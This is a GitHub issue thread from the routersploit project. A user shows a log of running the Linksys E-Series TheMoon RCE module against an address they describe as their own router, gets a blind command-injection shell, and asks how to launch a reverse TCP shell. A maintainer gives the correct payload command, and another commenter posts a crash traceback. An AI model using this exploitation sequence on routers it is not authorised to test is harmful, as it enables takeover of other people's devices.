New to routersploit, what to do after run of exploit in cmd?

windowshopr commented 2 years ago

! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY !

Steps to Reproduce (for bugs)

Not a bug, just need guidance

Your Environment

RouterSploit Version used: 3.4.1
Operating System and version: Kali 2021.3
Python Version: 3.9.7
Python Environment: There's too many packages to display here, but I just installed the routersploit requirements today (July 3).

Current Behavior

It's better if I show you the steps I ran in the output:


[+] 172.16.1.254 Device is vulnerable:

Target           Port     Service     Exploit                                          
------           ----     -------     -------                                          
172.16.1.254     80       http        exploits/routers/linksys/eseries_themoon_rce

[-] 172.16.1.254 Could not find default credentials rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce rsf (Linksys E-Series TheMoon RCE) > show options

Target options:

Name Current settings Description

ssl false SSL enabled: true/false
target Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description

verbosity true Verbosity enabled: true/false
arch mipsle Target architecture: mipsbe, mipsle

rsf (Linksys E-Series TheMoon RCE) > set target 172.16.1.254 [+] target => 172.16.1.254 rsf (Linksys E-Series TheMoon RCE) > check [+] Target is vulnerable rsf (Linksys E-Series TheMoon RCE) > run [] Running module exploits/routers/linksys/eseries_themoon_rce... [+] Target is vulnerable [] Invoking command loop... [*] It is blind command injection - response is not available

[+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands.

cmd > show payloads [*] Available payloads:

Payload Name Description

mipsle/bind_tcp MIPSLE Bind TCP Creates interactive tcp bind shell for MIPSLE architecture.
mipsle/reverse_tcp MIPSLE Reverse TCP Creates interactive tcp reverse shell for MIPSLE architecture.

cmd > use mipsle/reverse_tcp [*] Executing 'use mipsle/reverse_tcp' on the device...

cmd > set lhost 172.16.1.228 [*] Executing 'set lhost 172.16.1.228' on the device...

cmd > set lport 4321 [*] Executing 'set lport 4321' on the device...

cmd > run [*] Executing 'run' on the device...

cmd > execute [*] Executing 'execute' on the device...

cmd > use payloads/mipsle/reverse_tcp [*] Executing 'use payloads/mipsle/reverse_tcp' on the device...

cmd >



## Expected Behavior
* As you can see at the end there, I was trying to figure out what to do, but essentially, I followed the steps to find the specific vulnerabilities of my router, and it found the `exploits/routers/linksys/eseries_themoon_rce` exploit, which is odd because my router is a 2wire, but maybe they're the same thing.
* Once I `use` the exploit, set my router as the `target`,  it seems to open a `cmd` terminal environment to the device. Is this normal? It says that it's a blind command injection, which is fine, however I try to `use use mipsle/reverse_tcp` to attempt a reverse shell, but I think I'm doing this wrong.

Do I create the reverse shell OUTSIDE of this `cmd` first, and then somehow run an inject command to inject that payload into the router? And if so, how do I accomplish that? The tutorials on here show how to create the payload, but nothing from there.

lucyoa commented 1 year ago

it should be set payload mipsle/reverse_tcp

Codeiology commented 1 year ago

Traceback (most recent call last): File "interpreter.py", line 389, in command_run self.current_module.run() File "eseries_themoon_rce.py", line 54, in run shell(self, architecture="mipsle", method="wget", location="/tmp") File "shell.py", line 124, in shell data = payload.generate() ^^^^^^^^^^^^^^^^^^ File "reverse_tcp.py", line 21, in generate reverse_ip = utils.convert_ip(self.lhost) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "utils.py", line 69, in convert_ip res += bytes([int(i)]) ^^^^^^ ValueError: invalid literal for int() with base 10: ''

During handling of the above exception, another exception occurred:

Traceback (most recent call last): File "rsf.py", line 29, in routersploit(sys.argv) File "rsf.py", line 25, in routersploit rsf.start() File "interpreter.py", line 125, in start command_handler(args, *kwargs) File "utils.py", line 177, in wrapper return fn(self, args, *kwargs) ^^^^^^^^^^^^^^^^^^^^^^^^^ File "interpreter.py", line 394, in command_run print_error(traceback.format_exc(sys.exc_info())) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "traceback.py", line 187, in format_exc return "".join(format_exception(sys.exc_info(), limit=limit, chain=chain)) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "traceback.py", line 139, in format_exception te = TracebackException(type(value), value, tb, limit=limit, compact=True) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "traceback.py", line 690, in init self.stack = StackSummary._extract_from_extended_frame_gen( ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "traceback.py", line 409, in _extract_from_extended_frame_gen if limit >= 0: ^^^^^^^^^^ TypeError: '>=' not supported between instances of 'tuple' and 'int'

Codeiology commented 1 year ago

Is what it says when I try to run the payload

threat9 / routersploit